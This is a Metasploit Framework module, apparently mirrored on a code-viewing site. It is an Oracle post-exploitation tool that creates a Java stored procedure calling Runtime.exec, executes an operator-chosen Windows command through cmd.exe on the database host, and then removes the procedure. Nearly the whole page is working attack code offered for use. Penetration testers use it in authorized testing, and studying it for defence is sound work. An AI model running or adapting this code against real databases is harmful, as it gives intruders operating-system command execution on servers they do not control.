Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle Java execCommand (Win32)',

14
        'Description' => %q{

15
          This module will create a java class which enables the execution of OS commands.

16
        },

17
        'Author' => [ 'MC' ],

18
        'License' => MSF_LICENSE,

19
        'References' => [

20
          [ 'URL', 'http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/' ],

21
        ],

22
        'DisclosureDate' => '2007-12-07',

23
        'Notes' => {

24
          'Stability' => [CRASH_SAFE],

25
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],

26
          'Reliability' => []

27
        }

28
      )

29
    )

30


31
    register_options(

32
      [

33
        OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),

34
      ]

35
    )

36
  end

37


38
  def run

39
    return if !check_dependencies

40


41
    source = Rex::Text.rand_text_alpha_upper(1..10)

42
    name = Rex::Text.rand_text_alpha_upper(1..10)

43


44
    java = "

45
      create or replace and resolve java source named \"#{source}\" as

46
      import java.lang.*;

47
      import java.io.*;

48
      public class #{source}

49
      {

50
      public static void execCommand (String command) throws IOException

51
      {

52
      Runtime.getRuntime().exec(command);

53
      }

54
      };

55
      "

56


57
    procedure = "

58
      create or replace procedure #{name} (p_command in varchar2)

59
      as language java

60
      name '#{source}.execCommand (java.lang.String)';

61
      "

62


63
    exec = "begin #{name}('cmd.exe /c #{datastore['CMD']}'); end;"

64


65
    drops = "drop java source #{source}"

66


67
    dropp = "drop procedure #{name}"

68


69
    begin

70
      print_status("Creating java source '#{source}'...")

71
      prepare_exec(java)

72
    rescue StandardError

73
      return

74
    end

75


76
    print_status("Creating procedure '#{name}'...")

77
    prepare_exec(procedure)

78


79
    print_status("Sending command: '#{datastore['CMD']}'")

80
    prepare_exec(exec)

81


82
    print_status("Removing java source '#{source}'...")

83
    prepare_exec(drops)

84


85
    print_status("Removing procedure '#{name}'...")

86
    prepare_exec(dropp)

87
  end

88
end

89


90